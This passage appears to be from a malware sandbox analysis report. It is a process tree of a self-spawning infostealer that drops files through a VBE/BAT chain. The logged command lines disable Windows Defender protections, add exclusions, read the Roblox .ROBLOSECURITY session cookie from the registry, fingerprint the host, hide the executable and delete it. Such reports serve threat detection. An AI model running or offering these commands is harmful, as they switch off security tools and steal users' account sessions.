        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        61⤵
        
        PID:3844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        61⤵
        
        PID:3684
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        61⤵
        
        PID:1668
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        61⤵
        
        PID:3596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        61⤵
        Detects videocard installed
        
        PID:3192
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        61⤵
        
        PID:1580
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        62⤵
        Runs ping.exe
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        60⤵
        
        PID:1404
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        61⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        62⤵
        
        PID:1516
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        63⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        59⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        59⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        60⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        61⤵
        
        PID:3092
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        62⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        58⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        58⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        59⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        60⤵
        
        PID:3444
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        61⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        57⤵
        
        PID:4732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:3412
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        58⤵
        Views/modifies file attributes
        
        PID:2600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        58⤵
        
        PID:2020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        58⤵
        
        PID:4552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        58⤵
        
        PID:2656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        58⤵
        
        PID:3188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        58⤵
        Detects videocard installed
        
        PID:788
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        58⤵
        
        PID:2776
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        59⤵
        Runs ping.exe
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        57⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        58⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        59⤵
        
        PID:4332
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        60⤵
        
        PID:3988
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        60⤵
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        56⤵
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        56⤵
        
        PID:2604
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        57⤵
        
        PID:220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        58⤵
        
        PID:776
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        59⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        55⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        55⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        56⤵
        
        PID:720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        57⤵
        
        PID:3644
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        58⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        54⤵
        
        PID:2452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:2064
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        55⤵
        Views/modifies file attributes
        
        PID:4624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        55⤵
        
        PID:3500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:4176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:1580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:3892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        55⤵
        
        PID:4480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        55⤵
        
        PID:3412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:3936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        55⤵
        
        PID:1208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        55⤵
        Detects videocard installed
        
        PID:3372
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        55⤵
        
        PID:928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:2848
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        56⤵
        Runs ping.exe
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        54⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        55⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        56⤵
        
        PID:4004
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        57⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        53⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        53⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        54⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        55⤵
        
        PID:1016
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        56⤵
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        52⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        52⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        53⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        54⤵
        
        PID:1248
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        55⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        51⤵
        
        PID:4748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:3556
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        52⤵
        Views/modifies file attributes
        
        PID:656
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        53⤵
        
        PID:2312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        52⤵
        
        PID:776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:5112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:3960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        52⤵
        
        PID:4892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        52⤵
        
        PID:3636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        53⤵
        
        PID:4040
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:3816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        52⤵
        
        PID:1468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        52⤵
        Detects videocard installed
        
        PID:788
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        52⤵
        
        PID:368
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        53⤵
        Runs ping.exe
        
        PID:348
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        51⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        52⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        53⤵
        
        PID:4552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:2020
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        54⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        50⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        50⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        51⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        52⤵
        
        PID:3092
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        53⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        49⤵
        
        PID:2256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:5088
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        50⤵
        Views/modifies file attributes
        
        PID:4536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:452
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        51⤵
        
        PID:5116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        50⤵
        
        PID:960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:3416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:4308
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        50⤵
        
        PID:4268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        50⤵
        
        PID:452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:1620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        50⤵
        
        PID:4892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        50⤵
        Detects videocard installed
        
        PID:220
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        50⤵
        
        PID:2396
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        51⤵
        Runs ping.exe
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        49⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        50⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        51⤵
        
        PID:1416
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        52⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        48⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        48⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        49⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        50⤵
        
        PID:4500
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        51⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        47⤵
        
        PID:1796
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:2772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:5096
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        48⤵
        Views/modifies file attributes
        
        PID:3812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        48⤵
        
        PID:3700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:1404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:3092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        48⤵
        
        PID:208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        48⤵
        
        PID:4408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:4068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        48⤵
        
        PID:5112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        48⤵
        Detects videocard installed
        
        PID:2776
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        48⤵
        
        PID:5052
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        49⤵
        Runs ping.exe
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        47⤵
        
        PID:1404
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        48⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        49⤵
        
        PID:2176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        50⤵
        
        PID:1624
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        50⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        46⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        46⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        47⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        48⤵
        
        PID:3676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:2028
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        49⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        45⤵
        
        PID:4400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:1896
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        46⤵
        Views/modifies file attributes
        
        PID:1092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
